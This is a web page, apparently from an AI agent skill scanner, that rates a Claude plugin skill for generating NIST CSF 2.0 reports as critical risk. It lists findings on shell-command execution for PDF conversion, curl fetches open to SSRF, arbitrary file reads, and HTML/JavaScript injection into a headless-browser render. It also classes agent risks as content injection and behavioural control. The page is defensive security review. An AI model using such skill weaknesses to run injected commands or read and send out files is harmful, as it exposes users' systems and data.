Prelude NIST CSF 2.0 Report Generator

Name: prelude-claude-plugin/nist
Author: preludeorg

View on GitHub↗

Share on X Share on LinkedIn Share on Bluesky

100Critical

This skill is highly vulnerable to command injection and

ThreatsCI SM CS BC S HITL

Behavior Analysis

Description verified — behavior matches claim

Claims to do

Prelude NIST CSF 2.0 Report Generator: You are an expert compliance analyst helping users build a comprehensive NIST Cybersecurity Framework 2.0 assessment report. You walk them through every subcategory of the framework, help them gather evidence, offer to pull data from their Prelude platform where applicable, and generate a professional branded PDF at the end.

Actually does

This skill uses various Prelude MCP tools (e.g., `get_account`, `scm_list_endpoints`, `get_activity`) to pull cybersecurity data from the user's Prelude platform. It collects manual input and third-party data from the user. Finally, it generates an HTML report and converts it to a PDF using `puppeteer`, `wkhtmltopdf`, or `weasyprint` by executing shell commands.

Threat Analysis

AI Agent Traps ↗Scanned 4/15/2026

Content InjectionPerception1 finding

Semantic ManipulationReasoningclean

Cognitive StateMemory & Learningclean

Behavioural ControlAction6 findings

SystemicMulti-Agent Dynamicsclean

Human-in-the-LoopHuman Overseerclean

Skill Info

Namepreludeorg/prelude-claude-plugin/nist

Registrygithub

Versiond5989ec05538

PURLpkg:github/preludeorg/prelude-claude-plugin@d5989ec05538?skill=nist

Source

Repository ↗SKILL.md ↗

SHA-256a7c19577eaac...

SHA-1d9c7e15a1b7c...

MD58e5f004d7fd7...

TLSH97c2c7abff78...

ssdeep768:n6cZfQMl...

Size26,423 bytes

Install

This skill has been flagged as potentially malicious. Review the findings below before installing.

GitHub

https://github.com/preludeorg/prelude-claude-plugin/tree/main/skills/nist

Claude CodeDocs

/plugin marketplace add preludeorg/prelude-claude-plugin

/plugin install nist@preludeorg/prelude-claude-plugin

Skills.shDocs

npx skills add https://github.com/preludeorg/prelude-claude-plugin --skill nist

Assessments (2)

AI Agent Traps ↗

Shell command execution function detectedcriticalcommand execution

Shell command execution function detected

100% confidenceline 282

system (

Command Execution via PDF Generation Utilitiescriticalcommand execution

The skill explicitly uses external binaries (`npx`, `node`, `wkhtmltopdf`, `python3`) to convert HTML reports to PDF. If the HTML content or file paths can be influenced by user input, this creates a direct command injection vulnerability, allowing arbitrary code execution on the host system.

100% confidenceline 425

npx --yes puppeteer browsers install chrome... node -e "..." wkhtmltopdf <html_file> <output.pdf> python3 -c "from weasyprint import HTML; HTML(filename='<html_file>').write_pdf('<output.pdf>')"

Command Execution and SSRF via `curl`criticalcommand execution

The agent offers to fetch data via `curl` from user-provided API endpoints. This creates a direct command injection vulnerability, allowing an attacker to execute arbitrary shell commands or perform Server-Side Request Forgery (SSRF) by manipulating the URL or `curl` arguments.

100% confidenceline 202

API: 'If you have an API endpoint, I can fetch data via curl'

Arbitrary File Read via User-Provided File Pathhighdata exfiltration

The agent offers to read and summarize data from a user-provided file path for CSV exports. This allows the agent to access and potentially exfiltrate arbitrary files from the system where the agent is running.

100% confidenceline 200

CSV export: 'Export from [tool] and share the file path — I'll read and summarize it'

Potentially Destructive Tool `partner_block`mediumresource abuse

The skill lists a tool named `partner_block` which suggests it can perform blocking actions. Without clear safeguards or explicit user confirmation, this tool could be abused to cause denial of service or unintended operational impact if triggered with malicious or incorrect parameters.

80% confidenceline 33

| Deploy detection | `partner_block` |

Access to Sensitive Activity Data via Prelude Toolslowdata exfiltration

The agent is instructed to use Prelude tools like `get_activity` with views such as 'protected' and 'threats'. While this is part of the skill's legitimate function, it means the agent has access to potentially sensitive security activity data, raising a low risk of inadvertent exposure or mishandling during summarization or reporting.

70% confidenceline 132

`get_activity` with view="protected"

HTML/JavaScript Injection in Report Generationhighprompt injection

User-provided input (e.g., manual descriptions) is embedded into the HTML report, which is then rendered by Puppeteer. Without proper sanitization, this could lead to HTML/JavaScript injection, allowing malicious code to execute within the headless browser context, potentially accessing local files or making network requests.

90% confidenceline 416

await page.goto('file://<absolute_path_to_html>', {waitUntil: 'networkidle0'});

Badge

Markdown

[![Mondoo Skill Check](https://mondoo.com/ai-agent-security/api/badge/github/preludeorg/prelude-claude-plugin/nist.svg)](https://mondoo.com/ai-agent-security/skills/github/preludeorg/prelude-claude-plugin/nist)

HTML

<a href="https://mondoo.com/ai-agent-security/skills/github/preludeorg/prelude-claude-plugin/nist"><img src="https://mondoo.com/ai-agent-security/api/badge/github/preludeorg/prelude-claude-plugin/nist.svg" alt="Mondoo Skill Check" /></a>

Image URL

https://mondoo.com/ai-agent-security/api/badge/github/preludeorg/prelude-claude-plugin/nist.svg

Secure your AI agents

Skills can read files, run commands, and access credentials. Mondoo helps organizations manage the security risks of AI agent skills across their entire fleet.

Continuous scanning of skills across all registries
Policy enforcement before skills reach your agents
Integration with your existing security workflow